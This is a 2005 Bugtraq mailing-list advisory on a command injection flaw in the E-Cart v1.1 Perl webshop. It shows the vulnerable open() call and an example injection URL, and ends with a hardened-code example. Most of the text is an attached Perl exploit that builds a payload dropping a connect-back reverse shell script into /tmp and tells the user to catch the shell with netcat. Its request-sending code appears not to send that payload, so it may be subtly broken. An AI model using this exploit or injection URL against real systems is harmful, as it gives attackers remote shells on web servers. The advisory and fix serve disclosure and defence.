[38574] in bugtraq
E-Cart v1.1 Remote Command Execution Vulnerability
daemon@ATHENA.MIT.EDU (Emanuele \"z\\\" Gentili)
Mon Apr 25 15:29:02 2005
Message-Id: <200504240215.j3O2FA8f000619@m-01.th.seeweb.it>
From: "Emanuele \"z\\\" Gentili" <emanuele@orvietolug.org>
To: <bugtraq@securityfocus.com>
Date: Sun, 24 Apr 2005 04:15:02 +0200
Exploit for "E-Cart v1.1 Remote Command Execution Vulnerability"; discovery: SoulBlack
============================================================
Title: E-Cart v1.1 Remote Command Execution Vulnerability
Discovery: SoulBlack - Security Research - http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <= E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
============================================================
*Summary
E-Cart is a mod of WepApp written in Perl. It is a webshop.
============================================================
*Problem Description:
The bug is in the file index.cgi, where the variable art that is passed to
"open()" has no input validation, allowing an attacker to execute arbitrary
commands.
Vulnerable code
---------------
sub viewart {
    &cartfooter;
    open(DATA, "$catdir/$info{'cat'}/$info{'art'}");
    hold(DATA);
    chomp(@data = <DATA>);
    release(DATA);
    close(DATA);
    ...
============================================================
*Example:
http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
============================================================
*Xpl:
http://www.soulblack.com.ar/repo/tools/ecart-xpl.php
============================================================
*Fix:
Contact the Vendor.
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar
Attachment: 7330ecart.pl
#!/usr/bin/perl
#
# info: emanuele@orvietolug.org
#
use IO::Socket;
print "\n\n ~~ www.badroot.org ~~ \n\n";
print " E-Cart E-Commerce Software index.cgi\n";
print " Remote Command Execution Vulnerability\n";
print " Affected version: <= E-Cart 2004 v1.1\n";
print " http://www.securityfocus.com/archive/1/396748/2005-04-20/2005-04-26/0 \n\n";
print " ~~ code by z\\ ~~\n\n\n";
print " 04.23.2005\n\n\n";
print "hostname: \n";
chomp($server=<STDIN>);
print "port: (default: 80)\n";
chomp($port=<STDIN>);
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );
print "path: (/cgi-bin/ecart/)\n";
chomp($path=<STDIN>);
print "your ip (for reverse connect): \n";
chomp($ip=<STDIN>);
print "your port (for reverse connect): \n";
chomp($reverse=<STDIN>);
print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";
print "[*] try to exploiting...\n";
$string="/$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>cbs.pl;perl cbs.pl $ip $reverse|";
print "[*] OK! \n";
print "[*] NOW, run in your box: nc -l -vv -p $reverse\n";
print "[*] starting connect back on $ip :$reverse\n";
print "[*] DONE!\n";
print "[*] Loock netcat windows and funny\n\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp) or die;
print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: 7330ecart\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " WARNING - WARNING - WARNING - WARNING \r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
print "If connect back shell not found:\n";
print "- you do not have privileges to write in /tmp\n";
print "- Shell not vulnerable\n\n\n";
print "Greetz: albythebest - #badroot irc.us.azzurra.org - #hacker.eu us.ircnet.org\n\n\n";
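The root cause in the advisory above is Perl's two-argument open(): a filename built from the cat and art CGI parameters that ends in "|" is treated as a command to run. The following is an added example of how the viewart read could be hardened; it is not E-Cart's code nor from the original post, and $catdir, the helper names and the sample paths are constructed.

```perl
#!/usr/bin/perl
# Added example, not the vendor's code: a hardened replacement for the
# open() in viewart. 'cat' and 'art' mirror the advisory's parameter names;
# valid_component, read_article and the sample paths are constructed.
use strict;
use warnings;
use File::Spec;

# Accept only plain file names: alphanumerics, '_', '-', '.', not starting
# with '.', at most 64 characters. '|', ';', '/', '..' and other shell
# metacharacters never reach open().
sub valid_component {
    my ($name) = @_;
    return defined $name
        && $name =~ /\A[A-Za-z0-9_-][A-Za-z0-9_.-]{0,63}\z/;
}

# Returns the article's lines, or dies with a short reason.
sub read_article {
    my ($catdir, $cat, $art) = @_;
    die "invalid category name\n" unless valid_component($cat);
    die "invalid article name\n"  unless valid_component($art);

    my $path = File::Spec->catfile($catdir, $cat, $art);
    # Three-argument open with an explicit '<' mode treats $path purely as
    # a file name, so a leading or trailing '|' can no longer start a pipe.
    open(my $fh, '<', $path) or die "cannot open article: $!\n";
    chomp(my @data = <$fh>);
    close($fh);
    return @data;
}

# Constructed inputs: the legitimate name from the advisory, its injected
# form, and a traversal attempt. Only the first one reaches open() (and
# reports a missing file unless the sample path exists on your box).
my $catdir = '/var/www/ecart/data';
for my $art ('reproductordvp-ns315.dat',
             'reproductordvp-ns315.dat|uname -a|',
             '../../../etc/passwd') {
    my @lines = eval { read_article($catdir, 'reproductores_dvd', $art) };
    print "$art => ", ($@ ? "error: $@" : scalar(@lines) . " lines\n");
}
```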